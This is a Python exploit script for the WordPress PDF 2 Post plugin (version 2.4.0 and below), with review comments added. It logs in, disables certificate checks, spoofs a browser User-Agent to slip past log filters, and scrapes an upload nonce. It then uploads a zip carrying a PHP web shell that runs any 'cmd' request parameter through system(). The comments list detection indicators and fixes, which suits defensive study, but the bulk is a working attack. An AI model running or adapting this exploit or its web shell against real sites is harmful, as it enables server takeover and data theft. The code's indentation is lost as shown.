#!/usr/bin/env python3
import requests
import argparse
from bs4 import BeautifulSoup
import zipfile
import os
# By: Khaled Alenzi (Nxploited)
# Module-level setup: one shared HTTP session used by every request below.
# These statements run at import time, not only when main() is called.
# NOTE(review): certificate verification is disabled for the whole session and
# the urllib3 warning about it is silenced, so the credentials posted by
# login() are sent without authenticating the server.
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
# Fixed desktop-browser User-Agent attached to every request, so traffic from
# this script does not carry the python-requests default; log filters keyed on
# that default will not match it.
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def log_success(message):
    """Print *message* to stdout behind the ``[+]`` success marker."""
    print("[+] {}".format(message))
def log_failure(message):
    """Print *message* to stdout behind the ``[-]`` failure marker."""
    print("[-] {}".format(message))
# Authenticate against <url>/wp-login.php with the shared session.
#   url      -- base URL of the WordPress site (trailing "/" is stripped)
#   username -- account name, sent as the 'log' form field
#   password -- account password, sent as the 'pwd' form field
# Returns True when the session's cookie jar holds a cookie whose name contains
# 'wordpress_logged_in', False otherwise.
# NOTE(review): every later step runs inside this authenticated session, so the
# issue needs a valid account; which role that account must have is not visible
# in this listing.
def login(url, username, password):
login_url = url.rstrip("/") + '/wp-login.php'
payload = {
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log+In'
}
headers = {'User-Agent': user_agent}
# The response object is never inspected; success is judged from cookies only.
response = session.post(login_url, data=payload, headers=headers)
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
log_success("Logged in successfully.")
return True
else:
log_failure("Failed to log in.")
return False
# Parse page_content as HTML and return the 'value' attribute of the
# <input name="pdf2post_upload_nonce"> element.
# Returns None when no such input exists or it has no 'value' attribute.
def extract_nonce(page_content):
soup = BeautifulSoup(page_content, 'html.parser')
nonce_input = soup.find('input', {'name': 'pdf2post_upload_nonce'})
if nonce_input and nonce_input.has_attr('value'):
return nonce_input['value']
return None
# Fetch the plugin's admin page (/wp-admin/edit.php?page=new-post-from-pdf)
# with the logged-in session and return the upload nonce found in it.
#   url -- base URL of the WordPress site (trailing "/" is stripped)
# Returns the nonce string, or None when the page does not answer 200 or the
# nonce field is missing.
# NOTE(review): a WordPress nonce is an anti-CSRF token tied to the session; it
# does not restrict what an authenticated user may upload, so its presence on
# the form is not a control against the upload that follows.
def get_upload_nonce(url):
target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
headers = {'User-Agent': user_agent}
response = session.get(target_url, headers=headers)
# Any status other than 200 is treated as failure.
if response.status_code != 200:
log_failure("Failed to load upload page.")
return None
nonce = extract_nonce(response.text)
if nonce:
# The nonce value itself is written to stdout here.
log_success(f"Found nonce: {nonce}")
else:
log_failure("Nonce not found.")
return nonce
# Build the archive that upload_payload() sends: write a PHP file to the
# current working directory, add it as the only member of a zip, then delete
# the loose PHP file.
#   zip_name -- file name of the archive to create
#   php_name -- file name of the PHP member inside the archive
# Returns nothing; the archive stays on disk.
# The PHP body hands the 'cmd' request parameter to system(), i.e. it is a
# minimal command-execution web shell.
# NOTE(review): for defenders, the indicators visible in this listing are the
# default names Nxploited.zip / nxploited.php and the literal response text
# "Nxploited shell". They are defaults of this one script, so treat them as
# weak indicators; the durable controls are denying PHP execution in
# upload-writable directories and alerting on new .php files appearing there.
# Where the plugin extracts the archive is not shown in this listing.
def create_zip_payload(zip_name='Nxploited.zip', php_name='nxploited.php'):
php_code = """<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
system($_REQUEST['cmd']);
echo "</pre>";
} else {
echo "Nxploited shell";
}
?>"""
with open(php_name, "w") as f:
f.write(php_code)
with zipfile.ZipFile(zip_name, 'w') as zipf:
zipf.write(php_name)
# Only the loose .php file is removed; the zip is kept for the upload step.
os.remove(php_name)
log_success(f"Payload {zip_name} created successfully.")
# Submit the archive to the plugin's upload form as a multipart POST.
#   url          -- base URL of the WordPress site (trailing "/" is stripped)
#   nonce        -- value sent in the 'pdf2post_upload_nonce' field
#   zip_filename -- local path of the archive; also used as the upload file name
# Returns nothing; the outcome is only logged.
# NOTE(review): the request is a POST to
# /wp-admin/edit.php?page=new-post-from-pdf carrying a multipart part named
# 'pdf_file_to_upload' declared as application/zip. In web-server or WAF logs,
# that endpoint receiving a non-PDF upload is the event to alert on.
# NOTE(review): the success branch implies the server accepted a zip on a field
# named for PDFs; the plugin-side fix would be to validate the upload type and
# the archive members. The plugin code is not shown here, so confirm against it.
def upload_payload(url, nonce, zip_filename):
target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
with open(zip_filename, 'rb') as f:
files = {
'pdf_file_to_upload': (zip_filename, f, 'application/zip')
}
data = {
'pdf2post_upload_nonce': nonce,
'_wp_http_referer': '/wp-admin/edit.php?page=new-post-from-pdf'
}
headers = {
'User-Agent': user_agent
}
response = session.post(target_url, headers=headers, data=data, files=files)
# Success is judged from status 200 plus a fixed phrase in the response body.
if response.status_code == 200 and "File uploaded successfully" in response.text:
log_success("Payload uploaded.")
else:
log_failure("Upload failed or payload not processed.")
# Command-line entry point: parse --url/--username/--password, build the
# archive, log in, fetch the upload nonce and submit the archive.
# Returns nothing; stops early when login fails or no nonce is found.
# The parser description names the affected software as the WordPress
# "PDF 2 Post" plugin at version 2.4.0 and below; sites running it should check
# the installed version. Whether a fixed release exists is not stated here.
# NOTE(review): the password is taken as a command-line argument, so it ends up
# in shell history and is visible in process listings.
def main():
parser = argparse.ArgumentParser(description="Exploit for WordPress PDF 2 Post Plugin <= 2.4.0 # By Nxploited (Khaled Alenazi)")
parser.add_argument('--url', '-u', required=True, help="Target WordPress site URL")
parser.add_argument('--username', '-un', required=True, help="Username")
parser.add_argument('--password', '-p', required=True, help="Password")
args = parser.parse_args()
print("Exploit By: Khaled_alenazi (Nxploited)")
# The archive is built before the login attempt, so it is written to disk even
# when authentication fails.
create_zip_payload()
if not login(args.url, args.username, args.password):
return
nonce = get_upload_nonce(args.url)
if nonce:
upload_payload(args.url, nonce, "Nxploited.zip")
else:
log_failure("Aborting exploit due to missing nonce.")
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
main()